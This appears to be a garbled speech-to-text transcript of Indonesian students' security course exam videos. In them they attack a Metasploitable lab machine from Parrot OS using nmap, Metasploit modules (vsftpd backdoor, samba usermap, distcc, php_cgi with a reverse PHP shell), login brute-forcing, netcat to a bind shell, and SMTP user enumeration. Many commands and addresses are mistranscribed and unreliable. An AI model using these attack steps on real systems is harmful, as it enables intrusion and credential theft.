Assalamualaikum warahmatullahi wabarakatuh. Saya Fadila Herpani Siregar dengan nomor BP 2001 08 10 12 dari kelas Teknik Komputer 2A. Di video kali ini, saya akan melakukan penyerangan terhadap port yang terdapat pada Metasploit Table menggunakan Parrot OS. Yang pertama, saya akan melakukan penyerangan terhadap port 21 atau FTP. Port 21 secara umum dibuat untuk koneksi FTP atau File Transfer Protocol. Port ini digunakan oleh FTP client untuk melakukan koneksi ke FTP server ketika user akan mengakses FTP server. Langkah yang pertama pada Parrot OS, ping terlebih dahulu ke IP tujuan. Lalu, setelah itu, ketikkan perintah nmap min sp ke IP tujuan. Nah, bagian FTP port 1, kita akan melakukan penyerangannya. Setelah itu, ketikkan perintah msf console. Setelah itu, ketikkan perintah search fsv tpd. Lalu use null. Nah, setelah itu, ketikkan perintah show option. Nah, setelah itu kita akan mengatur rhost dan airportnya terlebih dahulu dengan perintah set rhost 192.168.12.2, lalu set airport 21. Setelah itu lakukan show option kembali untuk melihat apakah host dan airportnya sudah terisi. Lalu setelah itu ketikkan perintah exploit. Nah, setelah itu ketikkan perintah reboot. Lalu kita tunggu pada Metasploit Table, dia akan melakukan reboot. Pada Metasploit Table, kita login kembali. Lalu setelah itu, kita buat perintah pwd untuk melihat direktorinya. Setelah itu, masukkan perintah ls untuk melihat list. Nah, di sini terdapat hacked.txt, username.txt, dan vulnerable. Setelah itu, masukkan perintah ls -l. Lalu kemudian ketikkan perintah touch username .txt. Setelah itu ls. Nah, pada list akan bertambah username.txt yang dibuat barusan. Setelah itu, buat perintah echo username admin password 12345.
simpan ke dalam username.txt. Nah, setelah itu ketikkan perintah get username.txt. Di situ akan terlihat username admin dan password 12345. Setelah itu, ketikkan perintah sudo get hackett.txt. Lalu di situ akan terlihat server Anda sudah dihack. Lalu, yang kedua, saya akan melakukan penyerangan terhadap port 23 atau telnet. Port 23 atau telnet adalah port untuk menghubungkan komputer dan server jarak jauh. Fungsinya mirip dengan SSH. Hanya saja, port 23 telnet tidak menggunakan enkripsi pada koneksinya. Untuk langkah yang pertama, masukkan perintah nmap -sp ke IP tujuan 68.12.2. Nah, kali ini kita akan melakukan penyerangan terhadap telnet port 23. Kemudian, masukkan perintah msf console. Setelah itu, masukkan perintah search telnet. Nah, setelah itu, lalu masukkan use34 untuk menunjukkan ke yang ini. use34. Setelah itu, show option. Nah, di bagian sini kita akan mengatur host dan portnya dengan perintah set host IP tujuan 12.2, lalu set port 23. Setelah itu, lakukan show option kembali. Nah, di sini host dan port sudah ada. Setelah itu, kita melihat file yang dibuat dengan nama username.txt dan password.txt dengan isinya masing-masing. Lalu, setelah itu, masukkan perintah set user file dengan set password file. Set user file set user file, lalu masukkan username.txt.
Setelah itu set password file. Set password file. Tarik yang ada password file. Setelah itu, bukan perintah exploit lagi. Nah, di sini dapat dilihat bahwa login successful untuk user-user. Dan bagian sini juga udah 100% komplit. Lalu yang ketiga, saya akan melakukan penyerangan terhadap port 3306 atau MySQL. Port 3306 merupakan port yang digunakan para programmer untuk melakukan proses manajemen basis data atau database. Karena port 3306 ini merupakan port yang terhubung dengan aplikasi MySQL. Untuk langkah yang pertama, kita cek IP target dengan perintah ipconfig pada metasploitable. Nah, setelah mengetahui IP target, lalu pada parent OS kita akan melakukan perintah nmap ke IP tujuan untuk melihat port yang terbuka. Nmap 192.168.12.2. Nah, di sini kita akan melakukan penyerangan terhadap MySQL dengan port 3306. Setelah itu, kita ketik perintah msf console. Lalu masukkan perintah untuk melihat modul untuk melihat database. Use auxiliary /admin /mysql /mysql_SQL. Setelah itu, lakukan perintah show option. Setelah itu, kita akan melakukan set pada airhost, airport, set username, dan set pada SQL-nya. Pertama-tama, kita lakukan set terhadap airhost dan airport dengan perintah set airhost ke IP tujuan 192.168.12.2. Lalu set airport 3306. Setelah itu, set username-nya dengan perintah set username root. Setelah itu, set SQL-nya dengan perintah set SQL show database. Nah, setelah itu lakukan perintah show option kembali untuk melihat apakah set yang tadi berhasil. Nah, dapat dilihat di sini airhost, airport, SQL, dan username-nya sudah ada. Setelah itu, lakukan perintah exploit. Nah, pada exploit ini sudah terlihat hasilnya auxiliary module execution complete.
Lalu yang keempat, saya akan melakukan penyerangan terhadap port 5900 atau VNC. VNC adalah singkatan dari Virtual Network Computing, menggunakan port 5900 dalam layanannya. Port ini berfungsi untuk menjalankan aplikasi sharing desktop dan platform remote control yang independen. VNC sangat populer dan juga digunakan untuk dukungan jarak jauh di banyak organisasi besar. Cara kerjanya tidak berbeda jauh dengan VC Anywhere. Langkah yang pertama, pada Metasploit table, kita akan cek IP targetnya dengan menggunakan perintah ivconfig. Nah, setelah IP targetnya sudah terlihat, lalu pada parrot OS kita akan memasukkan perintah nbtscan ke IP tujuan 192.168.12.2. Nah, setelah itu kita akan melihat IP address-nya dan MBS name-nya Metasploitable. Setelah itu, kita masukkan perintah nmap -sp ke IP tujuan 192.168.12.2. Nah, di sini kita akan melakukan penyerangan terhadap MVC pada port 5900. Lalu setelah itu kita akan masuk ke perintah msf console. Nah, setelah itu masukkan perintah search VNC 3.3. Karena di sini VNC protokol 3.3. Nah, setelah itu kita masuk ke auxiliary scanner VNC login atau sama dengan use 1. Setelah itu masukkan perintah show option. Lalu kita akan melakukan set host dan set port, lalu set stop on success. Dengan cara yang pertama kita set host terlebih dahulu, host ke IP tujuan 192.168.12.2. Lalu set port 5900. Setelah itu set stop on success true. Pada bagian stop on success yang false ini akan berubah menjadi true. Setelah itu lakukan show option kembali untuk melihat apakah set tadi sudah terbaca. Nah, terlihat di sini host, post dan stop on success-nya sudah berubah. Setelah itu masukkan perintah exploit. Nah, di sini hasil exploitnya sudah dapat terlihat. Auxiliary module execution complete. Baiklah, assalamualaikum warahmatullahi wabarakatuh. Di sini saya Sylvie Julika akan melakukan hacking pada Metasploit. Di sini saya akan mengganti saya sudah mengganti IP pada parrot dengan nomor 2 terakhir BP saya yaitu 19, dan begitupun dengan meta saya sudah menggantinya menjadi 19. Di sini saya akan melakukan hacking pada beberapa port, yaitu port 5432 yaitu PostgreSQL. Yang kedua yaitu port 25 yaitu
yaitu SMTP, dan port 22 yaitu SSH, dan port 6000 yaitu X11. Baiklah, di sini langkah awalnya kita harus melakukan melakukan ping pada parot dengan IP pada meta, yaitu 192.168.1.19.2 dan terhubung. Dan begitupun pada meta kita melakukan yaitu ping 192.168.19.1 dan terhubung. Keduanya sama-sama terkoneksi. Baiklah, setelah kita melakukan ping pada parot dan juga meta, di sini saya akan melakukan perintah nmap pada parot untuk mengetahui port mana yang terbuka, yaitu nmap min sv 192.168.19.2. Kita tunggu. Berikut port yang terbuka port yang terbuka. Selanjutnya saya akan melakukan hacking pada PostgreSQL, yang dimana ya kita masuk ke MSF console. Setelah itu kita masuk ke Ser Postgres. Dan setelah itu kita masuk ke use auxiliary scanner Postgres login. Setelah itu kita masuk, kita set username, yaitu Postgres. Kita set user password as dengan true. Setelah itu kita set rhost 192.168.19.2. Setelah itu kita jalankan. Setelah itu kita buka terminal baru. Kita masukkan perintah psql -192.168.19.2 -u Postgres dengan passwordnya yaitu Postgres. Di sini lakukan perintah /l dan /c template 1. Setelah itu masuk ke /dt dan yang terakhir yaitu /key. Kita sudah selesai melakukan hack pada PostgreSQL. Selanjutnya kita akan melakukan hack pada X11, itu perintahnya ssh -x -l msf admin
Setelah itu IP-nya 192.168.19.1 19.2 dengan passwordnya yaitu msf admin. Selanjutnya masuk ke ls min lah. Selanjutnya masuk ke sudo su dengan passwordnya yaitu msf admin, dan kita masuk ke WHO AMI nya yaitu root, dan uname-nya yaitu Linux. Dan selanjutnya kita akan melakukan hack pada port SSH. Di sini kita masuk ke msf console. Selanjutnya kita search SSH login. Kita use 0. Setelah itu kita show option. Setelah itu kita set airhost-nya, airhost 192.168.19.2. Selanjutnya kita set port, airportnya yaitu 22. Selanjutnya kita set user file, file yang sudah kita buat. Nih, username ini kita kopikan. Username ini isinya ada admin, root, dan msf admin. Di sini kita kopikan, kita enter. Setelah itu kita enter. Selanjutnya masuk ke set pass file dengan kita kopikan yang bagian password.txt nya yang isiannya yaitu admin 12345, root 1 sampai 0, dan msf admin. Ini kita kopikan, kita enter. Setelah itu kita masuk ke perintah yang terakhir yaitu exploit. Kita sudah selesai melakukan hack pada SSH. Selanjutnya kita melakukan hacker pada SMTP. Dan perintahnya yang pertama yaitu msf console. Setelah itu kita melakukan perintah use auxiliary scanner SMTP, selanjutnya /smtp enum. Selanjutnya show option. Selanjutnya masuk ke perintah set airhost ts 192.168.19.2.
Selanjutnya kita melakukan run, kita tunggu. Akhirnya sudah selesai. Selanjutnya kita buka terminal baru. Kita tuliskan perintah nc192.168.1.9.2 spasi 25. Selanjutnya kita tuliskan vrfy mysql vrfy modhelm. Selanjutnya vrfy daemon. Selanjutnya vrfy postgres vrfy tomtom. Selanjutnya quit. Kita setelah selesai melakukan hack pada SMTP. Assalamualaikum warahmatullahi wabarakatuh. Saya Faruk Alif, nomor BP 210.82038, kelas Teknik Komputer 2A. Kali ini saya akan mempresentasikan UAS keamanan komputer dan jaringan. Selanjutnya yaitu port 80 HTTP. Pertama ketik MSF console, lalu search php_cgi, use now, show options, lalu set host 192.168.382. Ini merupakan IP address dari Metasploitable atau IP target. Selanjutnya itu set airports 80, merupakan port dari Metasploitable-nya. Lalu set host 192.168.381. Ini merupakan IP address dari Parrot OS ini tersendiri. Lalu show payloads, lalu set payload, kita pilih payload php/reverse_php, lalu show options, lalu exploit, lalu kita ketik ls untuk melihat file-file yang ada dalam directory
lalu kita ketik echo, lalu masukkan teks yang ingin ditampilkan. Lalu kita masukkan ke file yang ingin dituju. Selanjutnya kita pergi ke browser, lalu buka IP dari Metasploit table-nya dan /http attack.php, dan sudah tampil apa yang ingin kita tampilkan tadi. Selanjutnya yaitu port 1524 bind shell. Pertama ketik NC 192.168.382 lalu spasi 1524. Ini merupakan IP dari Metasploit table-nya. Dan 1524 ini merupakan port yang kita gunakan, yaitu bind shell. Lalu enter. Sini kita sudah masuk ke dalam directory dari Metasploit table-nya. Lalu kita ketik uname spasi strip a. Di sini ditampilkan yaitu jenis servernya. Lalu ketik UMI, sini kita mengakses sebagai root, dan ketik pwd untuk melihat posisi directory. Selanjutnya kita masuk ke port 139 SMB. Pertama ketik msf console, lalu ketik search smb underscore version, use now, show options, lalu kita set rhost-nya 192.168.382, dan juga ini merupakan IP dari Metasploit table-nya. Lalu kita ketik run, lalu kita ketik search samba user map, lalu use now, show options, lalu kita set rhost-nya
192.168.382. Lalu lhost 192.168.381. Lalu kita exploit. Lalu kita ketik UMI, dan kita sudah masuk ke dalam directory metasploitable. Baiklah, selanjutnya yaitu port 3632 di sisi pertama. Ketik msf console, lalu kita ketik use exploit /unix/dcc_exit. Lalu show options, lalu ketik set rhost 192.168.382. Ini merupakan IP dari metasploitable tadi. Lalu ketik set payload cmd/unix bind_ruby. Lalu kita exploit. Dan untuk memastikan apakah kita sudah masuk ke metasploitable, kita ketik hostname. Dan di sini sudah tertulis hostname-nya itu metasploitable, menandakan kita sudah masuk ke metasploitable. Dan jika kita ketik ifconfig, maka akan ditampilkan port Ethernet yang ada di metasploitable, yaitu IP-nya 192.168.382. Lalu kita cek UMI. Di sini kita masuk sebagai daemon. Baiklah, hanya itu dari saya. Apabila ada kesalahan mohon dimaafkan. Wabillahi taufiq wal hidayah. Assalamualaikum warahmatullahi wabarakatuh.